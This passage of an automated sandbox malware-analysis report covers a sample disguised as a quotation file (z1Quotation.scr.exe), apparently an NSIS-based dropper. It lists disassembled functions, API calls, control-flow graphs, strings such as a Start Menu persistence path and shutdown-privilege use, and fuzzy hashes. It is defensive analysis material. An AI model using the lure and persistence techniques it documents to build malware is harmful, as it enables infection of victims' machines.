                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A69
                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403A8E
                                                                                                                  • ExitProcess.KERNEL32 ref: 00403AAF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                                                                                                  • String ID: "$"C:\Users\user\Desktop\z1Quotation.scr.exe"$1033$988$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines$C:\Users\user\Desktop$C:\Users\user\Desktop\z1Quotation.scr.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inaugurates Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K(v$user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0)$~nsu%X.tmp
                                                                                                                  • API String ID: 2956269667-185225626
                                                                                                                  • Opcode ID: d1951ebb32dae12d62d8959e603a7526d19d3f8a98441072881b82550705460d
                                                                                                                  • Instruction ID: 1392fa09a06fab17ce47273853005d4362f75c0c8b7365a1715fa3a1e4174f7e
                                                                                                                  • Opcode Fuzzy Hash: d1951ebb32dae12d62d8959e603a7526d19d3f8a98441072881b82550705460d
                                                                                                                  • Instruction Fuzzy Hash: D4F1F570A00654AAEB21AFA59D49B6F7FB8AF4130AF0440BFF941B61D2C77C4645CB2D
                                                                                                                  Function 00405620 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 152 405620-40563c 153 405642-405709 GetDlgItem * 3 call 404473 call 404d64 GetClientRect GetSystemMetrics SendMessageA * 2 152->153 154 4057cb-4057d1 152->154 172 405727-40572a 153->172 173 40570b-405725 SendMessageA * 2 153->173 155 4057d3-4057f5 GetDlgItem CreateThread CloseHandle 154->155 156 4057fb-405807 154->156 155->156 159 405829-40582f 156->159 160 405809-40580f 156->160 164 405831-405837 159->164 165 405884-405887 159->165 162 405811-405824 ShowWindow * 2 call 404473 160->162 163 40584a-405851 call 4044a5 160->163 162->159 176 405856-40585a 163->176 169 405839-405845 call 404417 164->169 170 40585d-40586d ShowWindow 164->170 165->163 167 405889-40588f 165->167 167->163 174 405891-4058a4 SendMessageA 167->174 169->163 177 40587d-40587f call 404417 170->177 178 40586f-405878 call 4054e2 170->178 180 40573a-405751 call 40443e 172->180 181 40572c-405738 SendMessageA 172->181 173->172 182 4059a1-4059a3 174->182 183 4058aa-4058d6 CreatePopupMenu call 406431 AppendMenuA 174->183 177->165 178->177 191 405753-405767 ShowWindow 180->191 192 405787-4057a8 GetDlgItem SendMessageA 180->192 181->180 182->176 189 4058d8-4058e8 GetWindowRect 183->189 190 4058eb-405901 TrackPopupMenu 183->190 189->190 190->182 193 405907-405921 190->193 194 405776 191->194 195 405769-405774 ShowWindow 191->195 192->182 196 4057ae-4057c6 SendMessageA * 2 192->196 197 405926-405941 SendMessageA 193->197 198 40577c-405782 call 404473 194->198 195->198 196->182 197->197 199 405943-405963 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 197->199 198->192 201 405965-405985 SendMessageA 199->201 201->201 202 405987-40599b GlobalUnlock SetClipboardData CloseClipboard 201->202 202->182
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040567F
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040568E
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004056CB
                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004056D2
                                                                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004056F3
                                                                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405704
                                                                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405717
                                                                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405725
                                                                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405738
                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040575A
                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040576E
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040578F
                                                                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040579F
                                                                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004057B8
                                                                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004057C4
                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040569D
                                                                                                                    • Part of subcall function 00404473: SendMessageA.USER32(00000028,?,?,004042A3), ref: 00404481
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004057E0
                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000055B4,00000000), ref: 004057EE
                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 004057F5
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405818
                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040581F
                                                                                                                  • ShowWindow.USER32(00000008), ref: 00405865
                                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405899
                                                                                                                  • CreatePopupMenu.USER32 ref: 004058AA
                                                                                                                  • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004058BF
                                                                                                                  • GetWindowRect.USER32(?,000000FF), ref: 004058DF
                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004058F8
                                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405934
                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405944
                                                                                                                  • EmptyClipboard.USER32 ref: 0040594A
                                                                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405953
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0040595D
                                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405971
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040598A
                                                                                                                  • SetClipboardData.USER32(?,00000000), ref: 00405995
                                                                                                                  • CloseClipboard.USER32 ref: 0040599B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                  • String ID: PB
                                                                                                                  • API String ID: 590372296-3672992855
                                                                                                                  • Opcode ID: 0b0950c93e2ac22f485665e38694073e8a4cdc0598d01e0b3f426199fdea2382
                                                                                                                  • Instruction ID: 132e01054c2c5f30c3bd78875c2181a1ba8bf765f9e299d28dcd51073f2705ab
                                                                                                                  • Opcode Fuzzy Hash: 0b0950c93e2ac22f485665e38694073e8a4cdc0598d01e0b3f426199fdea2382
                                                                                                                  • Instruction Fuzzy Hash: 39A14871A00208BFDB11AFA0DE85EAE7F79EB48355F10403AFA44B61A1CB754E51DF68
                                                                                                                  Function 00403F44 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 203 403f44-403f56 204 403f5c-403f62 203->204 205 4040bd-4040cc 203->205 204->205 208 403f68-403f71 204->208 206 40411b-404130 205->206 207 4040ce-404116 GetDlgItem * 2 call 40443e SetClassLongA call 40140b 205->207 212 404170-404175 call 40448a 206->212 213 404132-404135 206->213 207->206 209 403f73-403f80 SetWindowPos 208->209 210 403f86-403f8d 208->210 209->210 215 403fd1-403fd7 210->215 216 403f8f-403fa9 ShowWindow 210->216 220 40417a-404195 212->220 218 404137-404142 call 401389 213->218 219 404168-40416a 213->219 223 403ff0-403ff3 215->223 224 403fd9-403feb DestroyWindow 215->224 221 4040aa-4040b8 call 4044a5 216->221 222 403faf-403fc2 GetWindowLongA 216->222 218->219 244 404144-404163 SendMessageA 218->244 219->212 227 40440b 219->227 229 404197-404199 call 40140b 220->229 230 40419e-4041a4 220->230 234 40440d-404414 221->234 222->221 231 403fc8-403fcb ShowWindow 222->231 235 403ff5-404001 SetWindowLongA 223->235 236 404006-40400c 223->236 232 4043e8-4043ee 224->232 227->234 229->230 241 4043c9-4043e2 DestroyWindow EndDialog 230->241 242 4041aa-4041b5 230->242 231->215 232->227 240 4043f0-4043f6 232->240 235->234 236->221 243 404012-404021 GetDlgItem 236->243 240->227 245 4043f8-404401 ShowWindow 240->245 241->232 242->241 246 4041bb-404208 call 406431 call 40443e * 3 GetDlgItem 242->246 247 404040-404043 243->247 248 404023-40403a SendMessageA IsWindowEnabled 243->248 244->234 245->227 275 404212-40424e ShowWindow KiUserCallbackDispatcher call 404460 EnableWindow 246->275 276 40420a-40420f 246->276 250 404045-404046 247->250 251 404048-40404b 247->251 248->227 248->247 253 404076-40407b call 404417 250->253 254 404059-40405e 251->254 255 40404d-404053 251->255 253->221 256 404094-4040a4 SendMessageA 254->256 258 404060-404066 254->258 255->256 257 404055-404057 255->257 256->221 257->253 261 404068-40406e call 40140b 258->261 262 40407d-404086 call 40140b 258->262 271 404074 261->271 262->221 272 404088-404092 262->272 271->253 272->271 279 404250-404251 275->279 280 404253 275->280 276->275 281 404255-404283 GetSystemMenu EnableMenuItem SendMessageA 279->281 280->281 282 404285-404296 SendMessageA 281->282 283 404298 281->283 284 40429e-4042d8 call 404473 call 403f25 call 40639e lstrlenA call 406431 SetWindowTextA call 401389 282->284 283->284 284->220 295 4042de-4042e0 284->295 295->220 296 4042e6-4042ea 295->296 297 404309-40431d DestroyWindow 296->297 298 4042ec-4042f2 296->298 297->232 300 404323-404350 CreateDialogParamA 297->300 298->227 299 4042f8-4042fe 298->299 299->220 301 404304 299->301 300->232 302 404356-4043ad call 40443e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 300->302 301->227 302->227 307 4043af-4043c2 ShowWindow call 40448a 302->307 309 4043c7 307->309 309->232
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403F80
                                                                                                                  • ShowWindow.USER32(?), ref: 00403FA0
                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00403FB2
                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00403FCB
                                                                                                                  • DestroyWindow.USER32 ref: 00403FDF
                                                                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403FF8
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00404017
                                                                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040402B
                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00404032
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 004040DD
                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 004040E7
                                                                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00404101
                                                                                                                  • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00404152
                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 004041F8
                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00404219
                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040422B
                                                                                                                  • EnableWindow.USER32(?,?), ref: 00404246
                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040425C
                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00404263
                                                                                                                  • SendMessageA.USER32(?,000000F4,00000000,?), ref: 0040427B
                                                                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040428E
                                                                                                                  • lstrlenA.KERNEL32(Inaugurates Setup: Installing,?,Inaugurates Setup: Installing,00000000), ref: 004042B8
                                                                                                                  • SetWindowTextA.USER32(?,Inaugurates Setup: Installing), ref: 004042C7
                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004043FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                  • String ID: Inaugurates Setup: Installing
                                                                                                                  • API String ID: 121052019-74818142
                                                                                                                  • Opcode ID: 1f27660c4e768330e50029a77c4566e61775446ca69147adce250fb76112604e
                                                                                                                  • Instruction ID: fdc5698f5fa8d77b26b4ff0dd744a0e3a646a64ab96d2a2687719873445c0c0e
                                                                                                                  • Opcode Fuzzy Hash: 1f27660c4e768330e50029a77c4566e61775446ca69147adce250fb76112604e
                                                                                                                  • Instruction Fuzzy Hash: 99C1D3B1600204ABDB20AF61ED45E2B3AB9FB95705F40053EF741B61F2CB399852DB6D
                                                                                                                  Function 00405B60 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 522 405b60-405b86 call 405e1e 525 405b88-405b9a DeleteFileA 522->525 526 405b9f-405ba6 522->526 527 405d29-405d2d 525->527 528 405ba8-405baa 526->528 529 405bb9-405bc9 call 40639e 526->529 530 405bb0-405bb3 528->530 531 405cd7-405cdc 528->531 537 405bd8-405bd9 call 405d77 529->537 538 405bcb-405bd6 lstrcatA 529->538 530->529 530->531 531->527 533 405cde-405ce1 531->533 535 405ce3-405ce9 533->535 536 405ceb-405cf3 call 406731 533->536 535->527 536->527 545 405cf5-405d09 call 405d30 call 405b18 536->545 540 405bde-405be1 537->540 538->540 543 405be3-405bea 540->543 544 405bec-405bf2 lstrcatA 540->544 543->544 546 405bf7-405c15 lstrlenA FindFirstFileA 543->546 544->546 561 405d21-405d24 call 4054e2 545->561 562 405d0b-405d0e 545->562 547 405c1b-405c32 call 405d5b 546->547 548 405ccd-405cd1 546->548 555 405c34-405c38 547->555 556 405c3d-405c40 547->556 548->531 552 405cd3 548->552 552->531 555->556 558 405c3a 555->558 559 405c42-405c47 556->559 560 405c53-405c61 call 40639e 556->560 558->556 564 405c49-405c4b 559->564 565 405cac-405cbe FindNextFileA 559->565 572 405c63-405c6b 560->572 573 405c78-405c83 call 405b18 560->573 561->527 562->535 567 405d10-405d1f call 4054e2 call 406177 562->567 564->560 568 405c4d-405c51 564->568 565->547 570 405cc4-405cc7 FindClose 565->570 567->527 568->560 568->565 570->548 572->565 576 405c6d-405c76 call 405b60 572->576 581 405ca4-405ca7 call 4054e2 573->581 582 405c85-405c88 573->582 576->565 581->565 584 405c8a-405c9a call 4054e2 call 406177 582->584 585 405c9c-405ca2 582->585 584->565 585->565
                                                                                                                  APIs
                                                                                                                  • DeleteFileA.KERNELBASE(?,?,76273410,76272EE0,"C:\Users\user\Desktop\z1Quotation.scr.exe"), ref: 00405B89
                                                                                                                  • lstrcatA.KERNEL32(00421958,\*.*,00421958,?,?,76273410,76272EE0,"C:\Users\user\Desktop\z1Quotation.scr.exe"), ref: 00405BD1
                                                                                                                  • lstrcatA.KERNEL32(?,0040A014,?,00421958,?,?,76273410,76272EE0,"C:\Users\user\Desktop\z1Quotation.scr.exe"), ref: 00405BF2
                                                                                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,00421958,?,?,76273410,76272EE0,"C:\Users\user\Desktop\z1Quotation.scr.exe"), ref: 00405BF8
                                                                                                                  • FindFirstFileA.KERNEL32(00421958,?,?,?,0040A014,?,00421958,?,?,76273410,76272EE0,"C:\Users\user\Desktop\z1Quotation.scr.exe"), ref: 00405C09
                                                                                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405CB6
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405CC7
                                                                                                                  Strings
                                                                                                                  • \*.*, xrefs: 00405BCB
                                                                                                                  • "C:\Users\user\Desktop\z1Quotation.scr.exe", xrefs: 00405B69
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                  • String ID: "C:\Users\user\Desktop\z1Quotation.scr.exe"$\*.*
                                                                                                                  • API String ID: 2035342205-2925939100
                                                                                                                  • Opcode ID: cdf096585d9e3b85905218e100d42e8942b992ebc565a25f6cb8cd72531e50af
                                                                                                                  • Instruction ID: 9caf09bce89021a4d3b29efda3787c61f8b8052d49107e20d141aacc50a1ed88
                                                                                                                  • Opcode Fuzzy Hash: cdf096585d9e3b85905218e100d42e8942b992ebc565a25f6cb8cd72531e50af
                                                                                                                  • Instruction Fuzzy Hash: 0D51E430904B48AAEB21AB61CD49BBF7A78DF42758F14817BF841B11D2C73C5982DE6D
                                                                                                                  Function 00406ABA Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 800 406aba-406abf 801 406b30-406b4e 800->801 802 406ac1-406af0 800->802 803 407126-40713b 801->803 804 406af2-406af5 802->804 805 406af7-406afb 802->805 808 407155-40716b 803->808 809 40713d-407153 803->809 810 406b07-406b0a 804->810 806 406b03 805->806 807 406afd-406b01 805->807 806->810 807->810 811 40716e-407175 808->811 809->811 812 406b28-406b2b 810->812 813 406b0c-406b15 810->813 814 407177-40717b 811->814 815 40719c-4071a8 811->815 818 406cfd-406d1b 812->818 816 406b17 813->816 817 406b1a-406b26 813->817 821 407181-407199 814->821 822 40732a-407334 814->822 826 40693e-406947 815->826 816->817 824 406b90-406bbe 817->824 819 406d33-406d45 818->819 820 406d1d-406d31 818->820 825 406d48-406d52 819->825 820->825 821->815 829 407340-407353 822->829 827 406bc0-406bd8 824->827 828 406bda-406bf4 824->828 832 406d54 825->832 833 406cf5-406cfb 825->833 830 407355 826->830 831 40694d 826->831 835 406bf7-406c01 827->835 828->835 834 407358-40735c 829->834 830->834 838 406954-406958 831->838 839 406a94-406ab5 831->839 840 4069f9-4069fd 831->840 841 406a69-406a6d 831->841 842 406cd0-406cd4 832->842 843 406e65-406e72 832->843 833->818 844 406c99-406ca3 833->844 836 406c07 835->836 837 406b78-406b7e 835->837 863 4072c4-4072ce 836->863 864 406b5d-406b75 836->864 850 406c31-406c37 837->850 851 406b84-406b8a 837->851 838->829 847 40695e-40696b 838->847 839->803 854 406a03-406a1c 840->854 855 4072a9-4072b3 840->855 848 406a73-406a87 841->848 849 4072b8-4072c2 841->849 856 406cda-406cf2 842->856 857 4072dc-4072e6 842->857 843->826 846 406ec1-406ed0 843->846 852 4072e8-4072f2 844->852 853 406ca9-406ccb 844->853 846->803 847->830 858 406971-4069b7 847->858 862 406a8a-406a92 848->862 849->829 859 406c95 850->859 860 406c39-406c57 850->860 851->824 851->859 852->829 853->843 861 406a1f-406a23 854->861 855->829 856->833 857->829 865 4069b9-4069bd 858->865 866 4069df-4069e1 858->866 859->844 867 406c59-406c6d 860->867 868 406c6f-406c81 860->868 861->840 869 406a25-406a2b 861->869 862->839 862->841 863->829 864->837 870 4069c8-4069d6 GlobalAlloc 865->870 871 4069bf-4069c2 GlobalFree 865->871 873 4069e3-4069ed 866->873 874 4069ef-4069f7 866->874 872 406c84-406c8e 867->872 868->872 875 406a55-406a67 869->875 876 406a2d-406a34 869->876 870->830 879 4069dc 870->879 871->870 872->850 880 406c90 872->880 873->873 873->874 874->861 875->862 877 406a36-406a39 GlobalFree 876->877 878 406a3f-406a4f GlobalAlloc 876->878 877->878 878->830 878->875 879->866 882 4072d0-4072da 880->882 883 406c16-406c2e 880->883 882->829 883->850
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9ea94289b2a026dc3059498d07b743cc5b21ea38e77ce242d6acb7573c30e087
                                                                                                                  • Instruction ID: 453f16405a2cb519d53786049d793c75f1d20777a72ee0bd4e74daefce8bcdd6
                                                                                                                  • Opcode Fuzzy Hash: 9ea94289b2a026dc3059498d07b743cc5b21ea38e77ce242d6acb7573c30e087
                                                                                                                  • Instruction Fuzzy Hash: 86F18770D04229CBDF18CFA8C8946ADBBB1FF04305F25816ED856BB281D7786A86DF45
                                                                                                                  Function 00406731 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindFirstFileA.KERNELBASE(76273410,004221A0,00421D58,00405E61,00421D58,00421D58,00000000,00421D58,00421D58,76273410,?,76272EE0,00405B80,?,76273410,76272EE0), ref: 0040673C
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406748
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2295610775-0
                                                                                                                  • Opcode ID: f2e23ad87d5570838264cbfd82f2bc45b63f49524226958c9645f8cb89411b00
                                                                                                                  • Instruction ID: f36a56551d4d707032f20586e5c400ecb6d79ca6e6834010bc4baa9c1ae08460
                                                                                                                  • Opcode Fuzzy Hash: f2e23ad87d5570838264cbfd82f2bc45b63f49524226958c9645f8cb89411b00
